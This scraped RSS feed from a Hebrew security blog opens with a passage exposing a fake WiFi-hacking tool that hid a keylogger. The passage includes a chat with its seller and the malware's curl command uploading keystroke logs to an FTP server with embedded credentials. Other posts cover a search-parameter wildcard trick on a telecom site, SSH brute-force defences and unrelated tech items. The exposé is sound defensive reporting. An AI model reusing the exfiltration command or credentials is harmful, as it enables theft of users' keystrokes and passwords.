<p>המסכן צריך שיפצו אותו על ה&quot;זמן והמאמץ&quot;. אוי-אוי-אוי (ותזכרו שכל המאמץ שלו מסתכם בסקריפט הונאה בלבד – הוא אפילו לא טרח לכלול איזשהו כלי לפריצת/ניתוח רשת אלחוטית שזמין באופן חופשי&#8230;)</p>
<p dir="ltr">Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought</p>
<p dir="ltr">it was a shell script at the beginning). Did you base it on something existing</p>
<p dir="ltr">or write yourself?</p>
<p dir="ltr">fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code</p>
<p dir="ltr">Iftach(2:41 PM):  hence the activation i see…</p>
<p dir="ltr">fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope</p>
<p dir="ltr">you understand</p>
<p dir="ltr">Iftach(2:43 PM):  sure, i understand.</p>
<p dir="ltr">fadzilmahfodh(2:43 PM):  So you interested in the software?</p>
<p dir="ltr">Iftach(2:44 PM):  more from a research point of view – for an article I’m</p>
<p dir="ltr">writing</p>
<p dir="ltr">Iftach(2:44 PM):  so, the installer you use, I see that it contains some</p>
<p dir="ltr">additional code that is being compiled on the client.</p>
<p dir="ltr">fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user</p>
<p dir="ltr">hardware</p>
<p dir="ltr">Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that</p>
<p dir="ltr">to verify that the client is a registered one?</p>
<p dir="ltr">fadzilmahfodh(2:46 PM):  Well, that is another story…</p>
<p dir="ltr">Iftach(2:46 PM):  I’m listening</p>
<p dir="ltr">fadzilmahfodh(2:46 PM):  maybe some other time huh</p>
<p dir="ltr">Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords</p>
<p dir="ltr">through that keylogger that sends the data to your FTP?</p>
<p dir="ltr">fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court</p>
<p>בשלב הזה של &quot;הראיון&quot; שלנו, הבנתי שסיפור הכיסוי שלי הולך להיות יותר אמיתי ממה שחשבתי (ולהלן ה&quot;מאמר&quot; שאתם קוראים). אי אפשר להמציא שטויות כאלה, אז הייצי חייב לתעד את זה איכשהו&#8230;</p>
<p dir="ltr">Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure</p>
<p dir="ltr">people can send the activation email correctly?</p>
<p dir="ltr">Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for</p>
<p dir="ltr">activation – how many passwords do you manage to grab?</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with</p>
<p dir="ltr">data in server</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the</p>
<p dir="ltr">server</p>
<p dir="ltr">fadzilmahfodh(2:49 PM):  then everything will not run</p>
<p dir="ltr">Iftach(2:49 PM):  and how does that relate to the keylogging?</p>
<p dir="ltr">fadzilmahfodh(2:50 PM):  well, that i another story…</p>
<p dir="ltr">Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part</p>
<p dir="ltr">of the verification or is this a separate process?</p>
<p dir="ltr">Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that</p>
<p dir="ltr">FTP server per day?</p>
<p dir="ltr">fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the</p>
<p dir="ltr">hell am i going to tell you</p>
<p dir="ltr">Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the</p>
<p dir="ltr">site… I’m just doing some research on security tools.</p>
<p dir="ltr">fadzilmahfodh(2:52 PM):  bye</p>
<p dir="ltr">Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m</p>
<p dir="ltr">publishing the story as it is…</p>
<p dir="ltr">Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your</p>
<p dir="ltr">site visitor passwords. Unless you want to be quoted otherwise in the story…</p>
<p>ונאמן להבטחתי לפדזיל (או איך שלא קוראים לחכמולוג שלנו), אני מפרסם את ה&quot;ראיון&quot; שלנו ללא שינויים משמעותיים.</p>
<p>אבל רגע – יש עוד! עוד? כן כן! הדובדבן על הקצפת היה בשלב ששכנעתע את עצמי להציק לידידינו רק עוד פעם אחת, ולנסות להיכנס ל-FTP שאליו הוא שולח את כל רישומי ההקלדות של המשתמשים שלו. הרי שם המשתמש והסיסמא היו באחד הסקריפטים (כאמור – &quot;קימפול&quot; שלהם לבינרי לא כל כך עובד עלינו&#8230;)</p>
<p dir="ltr">curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt</p>
<p>ואז הגיע המסך שהשאיר לי חיוך שהספיק לכל הסופ&quot;ש:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/07/ftpclosed.png"><img class="aligncenter size-medium wp-image-1551" src="http://guym.co.il/wp-content/uploads/2010/07/ftpclosed-300x104.png" alt="שרת ה-FTP של הבחור" width="300" height="104" /></a></p>
<p>כמו שאומרים priceless.</p>
<p>אבל אתם יודעים מה? זה הכל באשמתנו! אם היינו &quot;תורמים&quot; לבחור כמו שהוא בטח מתחנן לכל מי ששולח לו אימייל, אז אולי היה לו מספיק כסף כדי לשלם עבור החשבון FTP שלו ב-drivehq, והיה יכול לעשות עוד כסך מלגנוב כסף נוסף מכל מי שנפל בהונאה שלו וקיבל keylogger במתנה.</p>
<p>גדול מהחיים. אבל ברצינות – מוסר השכל קצר (אחרת גיא לא היה מפרסם את זה עכשיו כששנינו מרצים רציניים בטכניון <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ) גם כלי סקיוריטי, במיוחד ממקומות לא מוכרים, זכאים לבדיקה קצרה. אני אולי קצת אולד-פשן אבל אם אני לא רואה את קוד המקור היום, אני הולך לדייק בקטנות. תסתכלו, תנטרו (רשת, זכרון, דיסק), ותבדקו שוב. לפעמים זה אפילו משתלם&#8230;</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=iamit&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%25a0%25d7%25a1%25d7%2595%25d7%25aa-%25d7%259c%25d7%25a8%25d7%259e%25d7%2595%25d7%25aa-%25d7%2594%25d7%2590%25d7%25a7%25d7%25a8%25d7%2599%25d7%259d-%25d7%2595%25d7%259c%25d7%25a6%25d7%2590%25d7%25aa-%25d7%2598%25d7%259e%25d7%2591%25d7%259c&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%9C%D7%A0%D7%A1%D7%95%D7%AA+%D7%9C%D7%A8%D7%9E%D7%95%D7%AA+%D7%94%D7%90%D7%A7%D7%A8%D7%99%D7%9D+%D7%95%D7%9C%D7%A6%D7%90%D7%AA+%D7%98%D7%9E%D7%91%D7%9C+%E2%80%93+%D7%A4%D7%95%D7%A1%D7%98+%D7%90%D7%95%D7%A8%D7%97+%D7%A9%D7%9C+%D7%99%D7%A4%D7%AA%D7%97+%D7%A2%D7%9E%D7%99%D7%AA+http://bit.ly/caU6YL" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9c%d7%a0%d7%a1%d7%95%d7%aa-%d7%9c%d7%a8%d7%9e%d7%95%d7%aa-%d7%94%d7%90%d7%a7%d7%a8%d7%99%d7%9d-%d7%95%d7%9c%d7%a6%d7%90%d7%aa-%d7%98%d7%9e%d7%91%d7%9c/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;איך למצוא את המבצעים הטובים של הוט?&#8236;</title>		<link>http://guym.co.il/hot-best-deal/?nucrss=1</link>
		<comments>http://guym.co.il/hot-best-deal/#comments</comments>
		<pubDate>Tue, 29 Jun 2010 05:31:09 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[DLP]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1538</guid>
		<description><![CDATA[&#8235;חבר שלי, נתי כהן צמח, שלח לי את זה:
לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.
רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:
http://www.hot.net.il/REGULATIONS.aspx?FolderID=906
לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:
https://encrypted.google.com/search?hl=en&#38;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22
לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.
אז התחלתי לקרוא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhot-best-deal&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלי, נתי כהן צמח, שלח לי את זה:</p>
<p>לא בטוח אם זו חולשה או בכוונה, אבל זה מצחיק ממש.</p>
<p>רציתי למצוא תקנון מבצע מסויים. חיפוש קצר בגוגל הוביל אותי לעמוד הזה:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906</a></p>
<p>לא היה לי את המספר שלו. אז עוד חיפוש בגוגל והפעם:<br />
<a href="https://encrypted.google.com/search?hl=en&amp;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22" target="_blank">https://encrypted.google.com/search?hl=en&amp;q=site:hot.net.il+%22%D7%9E%D7%A1%D7%A4%D7%A8+%D7%AA%D7%A7%D7%A0%D7%95%D7%9F%22</a></p>
<p>לא מצאתי אותו בדיוק אבל שמתי לב שמספר התקנון הוא בעצם תאריך הכתיבה שלו.<br />
אז התחלתי לקרוא קצת את העמוד הקודם, והבנתי איך מחפשים:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=20100101" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=20100101</a></p>
<p>אז למה בעצם לא לעשות את זה:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2%2a" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2%2a</a><br />
טוב, כי זה לא עובד&#8230;</p>
<p>אבל רגע, זה כן:<br />
<a href="http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2???????" target="_blank">http://www.hot.net.il/REGULATIONS.aspx?FolderID=906&amp;Search=2???????</a></p>
<p>ROFL</p>
<p>תודה נתי <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhot-best-deal&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%9C%D7%9E%D7%A6%D7%95%D7%90+%D7%90%D7%AA+%D7%94%D7%9E%D7%91%D7%A6%D7%A2%D7%99%D7%9D+%D7%94%D7%98%D7%95%D7%91%D7%99%D7%9D+%D7%A9%D7%9C+%D7%94%D7%95%D7%98%3F+http://bit.ly/cNfEGo" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/hot-best-deal/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;googlecl: גוגל ב-CLI&#8236;</title>		<link>http://guym.co.il/googlec/?nucrss=1</link>
		<comments>http://guym.co.il/googlec/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 12:25:22 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1536</guid>
		<description><![CDATA[&#8235;אז אם אתם כבר משתמשים בשירותים של גוגל, למה לא לעשות את זה מה-CLI?
מה אפשר לעשות?

Blogger
$ google blogger  post --title "foo" "command line posting"


Calendar
$  google calendar add "Lunch with Jim at noon tomorrow"


Contacts
$  google contacts list name,email &#62; contacts.csv


Docs
$  google docs edit --title "Shopping list"


Picasa
$  google picasa create --album "Cat [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgooglec&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אז אם אתם כבר משתמשים בשירותים של גוגל, למה לא לעשות את זה מה-CLI?</p>
<p>מה אפשר לעשות?</p>
<ul>
<li><strong>Blogger</strong></li>
<blockquote><p><tt dir="ltr">$ google blogger  post --title "foo" "command line posting"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Calendar</strong></li>
<blockquote><p><tt dir="ltr">$  google calendar add "Lunch with Jim at noon tomorrow"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Contacts</strong></li>
<blockquote><p><tt dir="ltr">$  google contacts list name,email &gt; contacts.csv</tt></p></blockquote>
</ul>
<ul>
<li><strong>Docs</strong></li>
<blockquote><p><tt dir="ltr">$  google docs edit --title "Shopping list"</tt></p></blockquote>
</ul>
<ul>
<li><strong>Picasa</strong></li>
<blockquote><p><tt dir="ltr">$  google picasa create --album "Cat Photos" ~/photos/cats/*.jpg</tt></p></blockquote>
</ul>
<ul>
<li><strong>Youtube</strong></li>
<blockquote><p><tt dir="ltr">$  google youtube post --category Education killer_robots.avi</tt></p></blockquote>
</ul>
<p>אם אתם בעניין, תצטרכו את <a href="http://code.google.com/p/gdata-python-client/" target="_blank">gdata-python-client library</a> ואת <a href="http://code.google.com/p/googlecl/" target="_blank">googlecl</a>.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fgooglec&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=googlecl%3A+%D7%92%D7%95%D7%92%D7%9C+%D7%91-CLI+http://bit.ly/9KpOuH" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/googlec/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>&#8235;התקפות Brute Force נגד SSH&#8236;</title>		<link>http://guym.co.il/ssh-bruteforce-countermeasures/?nucrss=1</link>
		<comments>http://guym.co.il/ssh-bruteforce-countermeasures/#comments</comments>
		<pubDate>Sat, 19 Jun 2010 07:48:44 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1533</guid>
		<description><![CDATA[&#8235;יש כרגע גל של התקפות כנגד שרתי SSH.
ההתקפות הן מסוג Brute Force והן מבוצעות בשיטה מבוזרת (הרבה מחשבים תוקפים שכל אחד מנסה סיסמה או כמה סיסמאות).
מה אמורים לעשות?
1. לשנות את הסיסמה לקשה ומסובכת מספיק תוך שמירת מדיניות החלפה וכן נעילה לאחר מספר שגיאות. לחילופין אפשר וכדאי לאפשר גישה רק באמצעות מפתח ולא באמצעות סיסמה. כמובן [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fssh-bruteforce-countermeasures&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יש כרגע גל של התקפות כנגד שרתי SSH.</p>
<p>ההתקפות הן מסוג Brute Force והן מבוצעות בשיטה מבוזרת (הרבה מחשבים תוקפים שכל אחד מנסה סיסמה או כמה סיסמאות).</p>
<p>מה אמורים לעשות?</p>
<p>1. לשנות את הסיסמה לקשה ומסובכת מספיק תוך שמירת מדיניות החלפה וכן נעילה לאחר מספר שגיאות. לחילופין אפשר וכדאי לאפשר גישה רק באמצעות מפתח ולא באמצעות סיסמה. כמובן שכדאי לגבות את המפתח..</p>
<p>2. אם יש לכם גישה באמצעות מפתח ואתם לא זקוקים לגישה עם סיסמה, לשנות את sshd_config כך שיכיל:</p>
<p>PasswordAuthentication no וגם ChallengeResponseAuthentication no. שימו לב לעשות זאת רק אחרי שיש לכם אפשרות גישה עם מפתח אחרת תנעלו לעצמכם את הגישה לשרת ולא תוכל להיכנס אליו בדרכים שיגרתיות!</p>
<p><a href="http://www.debian-administration.org/articles/152" target="_blank">Passwordless logins to ssh.</a></p>
<p>3. אם אתם מנהלים את השרת רק ממקום יחיד &#8211; אולי כדאי לנעול גישה לפורט 22 רק מה-IP שלכם. (ניתן לביצוע רק אם יש לכם IP קבוע).</p>
<p>בהצלחה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fssh-bruteforce-countermeasures&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%94%D7%AA%D7%A7%D7%A4%D7%95%D7%AA+Brute+Force+%D7%A0%D7%92%D7%93+SSH+http://bit.ly/afseTj" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/ssh-bruteforce-countermeasures/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;למה לא יהיה לי iPhone 4?&#8236;</title>		<link>http://guym.co.il/iphone-4/?nucrss=1</link>
		<comments>http://guym.co.il/iphone-4/#comments</comments>
		<pubDate>Sun, 13 Jun 2010 06:36:47 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[iphone]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1530</guid>
		<description><![CDATA[&#8235;בגלל iTunes.
התוכנה הזאת פשוט בלתי אפשרית.
המחשב הקודם שהיה לי האייפון התחבר וקיבל דרייבר בעייתי כך שאייטונז לא זיהה אותו. אי אפשר לסנכרן אלא אם כן מתקינים ידנית כל פעם את הדרייבר.
המחשב הוחלף והיה לי שבוע של חוסר צרות, הכל עבר כמו שצריך.
עכשיו אייטונז לא מזהה שהאאוטלוק שלי הוא ברירת מחדל ונותן בגלל זה את ההודעה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fiphone-4&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בגלל iTunes.</p>
<p>התוכנה הזאת פשוט בלתי אפשרית.</p>
<p>המחשב הקודם שהיה לי האייפון התחבר וקיבל דרייבר בעייתי כך שאייטונז לא זיהה אותו. אי אפשר לסנכרן אלא אם כן מתקינים ידנית כל פעם את הדרייבר.</p>
<p>המחשב הוחלף והיה לי שבוע של חוסר צרות, הכל עבר כמו שצריך.</p>
<p>עכשיו אייטונז לא מזהה שהאאוטלוק שלי הוא ברירת מחדל ונותן בגלל זה את ההודעה האינפורמטיבית הבאה:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/06/itunes.png"><img class="aligncenter size-full wp-image-1531" title="הודעת שגיאה ריקה ב-iTunes" src="http://guym.co.il/wp-content/uploads/2010/06/itunes.png" alt="iTunes empty error dialog" width="157" height="145" /></a>זהו. נמאס לי.</p>
<p>אני לא משוכנע שזאת האיכות המדהימה שסטיב ג'ובס רגיל לתת ללקוחות שלו ואני בטוח שיש כאלה שיאשימו את ה-WINDOWS, ה-OUTLOOK, כדור הארץ או כל דבר אחר.</p>
<p>העובדה היא שלי אין אלטרנטיבה שתפתור את הבעיה ולכן אני לא יכול להמשיך לעבוד עם המכשיר הזה עם כל האהבה שלי כלפיו.</p>
<p>הדבר היותר בעייתי בכל העניין הוא שאני שוקל טלפון עם אנדרוייד עליו. כן, עם כל האהבה שלי לגוגל.</p>
<p>מדהים לאן החיים מגלגלים אותנו.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fiphone-4&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9C%D7%9E%D7%94+%D7%9C%D7%90+%D7%99%D7%94%D7%99%D7%94+%D7%9C%D7%99+iPhone+4%3F+http://bit.ly/cywusj" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/iphone-4/feed/</wfw:commentRss>
		<slash:comments>35</slash:comments>
		</item>
		<item>
		<title>&#8235;מה עושים לטוקבקיסטים תמוהים?&#8236;</title>		<link>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 04:45:57 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1527</guid>
		<description><![CDATA[&#8235;אחד העובדים של גוגל התעצבן על RSnake שכתב על GOOGLE דברים לא מאוד נחמדים (בצדק?) על פרסום מוקדם מדי של הבאג שנמצא לאחרונה במערכות העזרה של מיקרוסופט.
הבחור הגיע לבלוג של RSnake וכתב הודעה &#34;תמימה&#34; בו הוא תמה למה RSnake אומר שגוגל עושה דברים לא ישרים מאחורי הגב שלנו.
התגובה של RSnake היתה להסביר שגם לבוא מתוך [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259e%25d7%2594-%25d7%25a2%25d7%2595%25d7%25a9%25d7%2599%25d7%259d-%25d7%259c%25d7%2598%25d7%2595%25d7%25a7%25d7%2591%25d7%25a7%25d7%2599%25d7%25a1%25d7%2598%25d7%2599%25d7%259d-%25d7%25aa%25d7%259e%25d7%2595%25d7%2594%25d7%2599%25d7%259d&crtId=148&dt=1283481168">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אחד העובדים של גוגל התעצבן על RSnake שכתב על GOOGLE דברים לא מאוד נחמדים (בצדק?) על פרסום מוקדם מדי של הבאג שנמצא לאחרונה במערכות העזרה של מיקרוסופט.<br />
הבחור הגיע לבלוג של RSnake וכתב הודעה &quot;תמימה&quot; בו הוא תמה למה RSnake אומר שגוגל עושה דברים לא ישרים מאחורי הגב שלנו.<br />
התגובה של RSnake היתה להסביר שגם לבוא מתוך IP של עובד גוגל ולתמוהה על דברים כאלה בלי להזדהות שאתה עובד בגוגל זה דבר בעייתי.<br />
צילום:<br />
<a href="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png"><br />
</a><a href="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png"><img class="aligncenter size-full wp-image-1528" title="טוקבקיסט של גוגל נחשף" src="http://guym.co.il/wp-content/uploads/2010/06/google-dude-and-rsnake.png" alt="" width="450" height="635" /></a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259e%25d7%2594-%25d7%25a2%25d7%2595%25d7%25a9%25d7%2599%25d7%259d-%25d7%259c%25d7%2598%25d7%2595%25d7%25a7%25d7%2591%25d7%25a7%25d7%2599%25d7%25a1%25d7%2598%25d7%2599%25d7%259d-%25d7%25aa%25d7%259e%25d7%2595%25d7%2594%25d7%2599%25d7%259d&crtId=148&dt=1283481168"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9E%D7%94+%D7%A2%D7%95%D7%A9%D7%99%D7%9D+%D7%9C%D7%98%D7%95%D7%A7%D7%91%D7%A7%D7%99%D7%A1%D7%98%D7%99%D7%9D+%D7%AA%D7%9E%D7%95%D7%94%D7%99%D7%9D%3F+http://bit.ly/d7kdkQ" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9e%d7%94-%d7%a2%d7%95%d7%a9%d7%99%d7%9d-%d7%9c%d7%98%d7%95%d7%a7%d7%91%d7%a7%d7%99%d7%a1%d7%98%d7%99%d7%9d-%d7%aa%d7%9e%d7%95%d7%94%d7%99%d7%9d/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;איך גוגל עובד?&#8236;</title>		<link>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 06:08:24 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1525</guid>
		<description><![CDATA[&#8235;פה ההסבר:

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2592%25d7%2595%25d7%2592%25d7%259c-%25d7%25a2%25d7%2595%25d7%2591%25d7%2593&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>פה ההסבר:<br />
<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/BNHR6IQJGZs&#038;color1=0xb1b1b1&#038;color2=0xd0d0d0&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.youtube.com/v/BNHR6IQJGZs&#038;color1=0xb1b1b1&#038;color2=0xd0d0d0&#038;hl=en_US&#038;feature=player_embedded&#038;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="385"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-%25d7%2592%25d7%2595%25d7%2592%25d7%259c-%25d7%25a2%25d7%2595%25d7%2591%25d7%2593&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+%D7%92%D7%95%D7%92%D7%9C+%D7%A2%D7%95%D7%91%D7%93%3F+http://bit.ly/abaq5E" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%90%d7%99%d7%9a-%d7%92%d7%95%d7%92%d7%9c-%d7%a2%d7%95%d7%91%d7%93/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>&#8235;מזמן לא היה לי טרול&#8236;</title>		<link>http://guym.co.il/trol-turki/?nucrss=1</link>
		<comments>http://guym.co.il/trol-turki/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 14:39:32 +0000</pubDate>
